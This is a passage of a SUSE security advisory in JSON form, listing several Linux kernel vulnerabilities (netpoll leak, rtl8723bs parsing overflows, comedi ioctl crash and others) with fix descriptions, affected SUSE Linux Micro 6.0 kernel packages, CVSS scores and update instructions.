- No -\u003endo_netpoll_cleanup() is either called\n\n4) Now the second target tries to clean up\n - The second cleanup fails because np-\u003edev-\u003enpinfo is already NULL.\n * In this case, ops-\u003endo_netpoll_cleanup() was never called, and\n the skb pool is not cleaned as well (for the second netpoll\n instance)\n - This leaks npinfo and skbpool skbs, which is clearly reported by\n kmemleak.\n\nRevert commit efa95b01da18 (\"netpoll: fix use after free\") and adds\nclarifying comments emphasizing that npinfo cleanup should only happen\nonce the refcount reaches zero, ensuring stable and correct netpoll\nbehavior.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68245",
"url": "https://www.suse.com/security/cve/CVE-2025-68245"
},
{
"category": "external",
"summary": "SUSE Bug 1255268 for CVE-2025-68245",
"url": "https://bugzilla.suse.com/1255268"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68245"
},
{
"cve": "CVE-2025-68249",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68249"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmost: usb: hdm_probe: Fix calling put_device() before device initialization\n\nThe early error path in hdm_probe() can jump to err_free_mdev before\n\u0026mdev-\u003edev has been initialized with device_initialize(). Calling\nput_device(\u0026mdev-\u003edev) there triggers a device core WARN and ends up\ninvoking kref_put(\u0026kobj-\u003ekref, kobject_release) on an uninitialized\nkobject.\n\nIn this path the private struct was only kmalloc\u0027ed and the intended\nrelease is effectively kfree(mdev) anyway, so free it directly instead\nof calling put_device() on an uninitialized device.\n\nThis removes the WARNING and fixes the pre-initialization error path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68249",
"url": "https://www.suse.com/security/cve/CVE-2025-68249"
},
{
"category": "external",
"summary": "SUSE Bug 1255233 for CVE-2025-68249",
"url": "https://bugzilla.suse.com/1255233"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68249"
},
{
"cve": "CVE-2025-68252",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68252"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmisc: fastrpc: Fix dma_buf object leak in fastrpc_map_lookup\n\nIn fastrpc_map_lookup, dma_buf_get is called to obtain a reference to\nthe dma_buf for comparison purposes. However, this reference is never\nreleased when the function returns, leading to a dma_buf memory leak.\n\nFix this by adding dma_buf_put before returning from the function,\nensuring that the temporarily acquired reference is properly released\nregardless of whether a matching map is found.\n\nRule: add",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68252",
"url": "https://www.suse.com/security/cve/CVE-2025-68252"
},
{
"category": "external",
"summary": "SUSE Bug 1255197 for CVE-2025-68252",
"url": "https://bugzilla.suse.com/1255197"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68252"
},
{
"cve": "CVE-2025-68254",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68254"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nstaging: rtl8723bs: fix out-of-bounds read in OnBeacon ESR IE parsing\n\nThe Extended Supported Rates (ESR) IE handling in OnBeacon accessed\n*(p + 1 + ielen) and *(p + 2 + ielen) without verifying that these\noffsets lie within the received frame buffer. A malformed beacon with\nan ESR IE positioned at the end of the buffer could cause an\nout-of-bounds read, potentially triggering a kernel panic.\n\nAdd a boundary check to ensure that the ESR IE body and the subsequent\nbytes are within the limits of the frame before attempting to access\nthem.\n\nThis prevents OOB reads caused by malformed beacon frames.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68254",
"url": "https://www.suse.com/security/cve/CVE-2025-68254"
},
{
"category": "external",
"summary": "SUSE Bug 1255140 for CVE-2025-68254",
"url": "https://bugzilla.suse.com/1255140"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68254"
},
{
"cve": "CVE-2025-68255",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68255"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nstaging: rtl8723bs: fix stack buffer overflow in OnAssocReq IE parsing\n\nThe Supported Rates IE length from an incoming Association Request frame\nwas used directly as the memcpy() length when copying into a fixed-size\n16-byte stack buffer (supportRate). A malicious station can advertise an\nIE length larger than 16 bytes, causing a stack buffer overflow.\n\nClamp ie_len to the buffer size before copying the Supported Rates IE,\nand correct the bounds check when merging Extended Supported Rates to\nprevent a second potential overflow.\n\nThis prevents kernel stack corruption triggered by malformed association\nrequests.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68255",
"url": "https://www.suse.com/security/cve/CVE-2025-68255"
},
{
"category": "external",
"summary": "SUSE Bug 1255395 for CVE-2025-68255",
"url": "https://bugzilla.suse.com/1255395"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68255"
},
{
"cve": "CVE-2025-68256",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68256"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nstaging: rtl8723bs: fix out-of-bounds read in rtw_get_ie() parser\n\nThe Information Element (IE) parser rtw_get_ie() trusted the length\nbyte of each IE without validating that the IE body (len bytes after\nthe 2-byte header) fits inside the remaining frame buffer. A malformed\nframe can advertise an IE length larger than the available data, causing\nthe parser to increment its pointer beyond the buffer end. This results\nin out-of-bounds reads or, depending on the pattern, an infinite loop.\n\nFix by validating that (offset + 2 + len) does not exceed the limit\nbefore accepting the IE or advancing to the next element.\n\nThis prevents OOB reads and ensures the parser terminates safely on\nmalformed frames.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68256",
"url": "https://www.suse.com/security/cve/CVE-2025-68256"
},
{
"category": "external",
"summary": "SUSE Bug 1255138 for CVE-2025-68256",
"url": "https://bugzilla.suse.com/1255138"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68256"
},
{
"cve": "CVE-2025-68257",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68257"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: check device\u0027s attached status in compat ioctls\n\nSyzbot identified an issue [1] that crashes kernel, seemingly due to\nunexistent callback dev-\u003eget_valid_routes(). By all means, this should\nnot occur as said callback must always be set to\nget_zero_valid_routes() in __comedi_device_postconfig().\n\nAs the crash seems to appear exclusively in i386 kernels, at least,\njudging from [1] reports, the blame lies with compat versions\nof standard IOCTL handlers. Several of them are modified and\ndo not use comedi_unlocked_ioctl(). While functionality of these\nioctls essentially copy their original versions, they do not\nhave required sanity check for device\u0027s attached status. This,\nin turn, leads to a possibility of calling select IOCTLs on a\ndevice that has not been properly setup, even via COMEDI_DEVCONFIG.\n\nDoing so on unconfigured devices means that several crucial steps\nare missed, for instance, specifying dev-\u003eget_valid_routes()\ncallback.\n\nFix this somewhat crudely by ensuring device\u0027s attached status before\nperforming any ioctls, improving logic consistency between modern\nand compat functions.\n\n[1] Syzbot report:\nBUG: kernel NULL pointer dereference, address: 0000000000000000\n...\nCR2: ffffffffffffffd6 CR3: 000000006c717000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n get_valid_routes drivers/comedi/comedi_fops.c:1322 [inline]\n parse_insn+0x78c/0x1970 drivers/comedi/comedi_fops.c:1401\n do_insnlist_ioctl+0x272/0x700 drivers/comedi/comedi_fops.c:1594\n compat_insnlist drivers/comedi/comedi_fops.c:3208 [inline]\n comedi_compat_ioctl+0x810/0x990 drivers/comedi/comedi_fops.c:3273\n __do_compat_sys_ioctl fs/ioctl.c:695 [inline]\n __se_compat_sys_ioctl fs/ioctl.c:638 [inline]\n __ia32_compat_sys_ioctl+0x242/0x370 fs/ioctl.c:638\n do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline]\n...",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68257",
"url": "https://www.suse.com/security/cve/CVE-2025-68257"
},
{
"category": "external",
"summary": "SUSE Bug 1255167 for CVE-2025-68257",
"url": "https://bugzilla.suse.com/1255167"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
